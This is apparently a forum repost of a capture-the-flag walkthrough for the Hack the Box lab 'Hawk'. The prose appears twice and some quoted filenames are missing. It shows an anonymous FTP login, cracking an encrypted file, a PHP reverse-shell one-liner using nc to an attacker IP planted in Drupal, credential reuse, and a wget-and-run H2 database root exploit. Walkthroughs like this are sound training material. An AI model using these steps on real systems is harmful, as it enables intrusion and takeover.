kecif
Distributed System Orchestrator
LEVEL 1
200 XP
Today we are going to solve another CTF challenge āHawkā. Hawk is a retired vulnerable lab presented by Hack the Box for helping pentesterās to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are online available therefore they have static IP. The IP of Hawk is 10.10.10.102
Penetration Methodology:
Walkthrough
Letās start off with our basic nmap command to find out the open ports and running services.
The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082 (h2 database http console).
From the NMAP Scan output, we saw that ftp Port 21 is Open and the next thing that catches our eyes is that it has Anonymous login allowed.
We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. ā.
Since
It came out to be OpenSSL encoded data with a salted password. Clearly, we need to decrypt the file to get any further clue.
To crack this file, we have used an OpenSSL bruteforce tool which is easily available on GitHub. You can download it from the given below link or can run the following command for downloading and script execution.
Boom!! We have successfully cracked the file and the Password Hint we got is ā
As port 80 is running http server, we open the target machineās IP address in our browser and found out itās a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.
Oh yeah!! We have successfully logged into the admin dashboard. Now go to modules and then enable the checkbox for Path and PHP filter.
After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.
Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.
Then select the Text format as āPHP codeā. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.
We got a reverse connection of the victimās machine on our netcat listener. To spawn the proper shell we have used python3 bin bash shell.
Inside
Then with the following command, we switch the user and logged in as user daniel.
Here we have used Simple phyton3 commands to escape the python3 interpreter.
From Nmap scan output we notice that ā
It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that, we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.
Afterward, we have downloaded our exploit 45506.py in the /tmp directory of the target machine. Then Grant the FULL permission to the exploit and execute it using the command.
Finally!! We have got the root access. Now letās go and get the āroot.txtā. We take a look at the content of the file and found our final flag.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are online available therefore they have static IP. The IP of Hawk is 10.10.10.102
Penetration Methodology:
- Port scanning and IP discovery
- Anonymous FTP Login
- Checking file type
- Getting Login Credentials
- Browsing IP through port 80
- Exploiting Drupal
- Reading First Flag User.txt
- Getting Login Credentials
- Spawning TTY Shell
- Searching exploit via Searchsploit
- Getting root Access
- Reading Final Flag Root.txt
Walkthrough
Letās start off with our basic nmap command to find out the open ports and running services.
Code:
nmap -A 10.10.10.102The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082 (h2 database http console).
From the NMAP Scan output, we saw that ftp Port 21 is Open and the next thing that catches our eyes is that it has Anonymous login allowed.
Code:
ftp 10.10.10.102We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. ā.
āand then we transferred the file to our local machine.
Since
is encrypted. Letās check the file type using the āfileā command.
Code:
file .drupal.txt.encIt came out to be OpenSSL encoded data with a salted password. Clearly, we need to decrypt the file to get any further clue.
To crack this file, we have used an OpenSSL bruteforce tool which is easily available on GitHub. You can download it from the given below link or can run the following command for downloading and script execution.
Code:
git clone https://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.encBoom!! We have successfully cracked the file and the Password Hint we got is ā
ā this could be the password for CMS Login. Letās Check it.
As port 80 is running http server, we open the target machineās IP address in our browser and found out itās a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.
Oh yeah!! We have successfully logged into the admin dashboard. Now go to modules and then enable the checkbox for Path and PHP filter.
After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.
Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.
Code:
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f"); ?>Then select the Text format as āPHP codeā. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.
Code:
nc -lvp 1234We got a reverse connection of the victimās machine on our netcat listener. To spawn the proper shell we have used python3 bin bash shell.
Code:
python3 -c 'import pty;pty.spawn("/bin/bash")'Inside
we have got to User.txt flag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the ā
ā file, in this file we found the password: drupal4hawk
Code:
cat settings.php | grep passwordThen with the following command, we switch the user and logged in as user daniel.
Code:
su daniel
Password: drupal4hawkHere we have used Simple phyton3 commands to escape the python3 interpreter.
Code:
>>import pty
>>pty.spawn('/bin/bash')From Nmap scan output we notice that ā
, therefore we search out for H2 database exploit in searchsploit.
Code:
searchsploit H2 databaseIt came out to be a Remote Code Execution. The exploit we have used is highlighted, after that, we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.
Code:
searchsploit -m 45506
python -m SimpleHTTPServer 8080Afterward, we have downloaded our exploit 45506.py in the /tmp directory of the target machine. Then Grant the FULL permission to the exploit and execute it using the command.
Code:
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 45506.py
python3 45506.py āH 127.0.0.1:8082
idFinally!! We have got the root access. Now letās go and get the āroot.txtā. We take a look at the content of the file and found our final flag.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here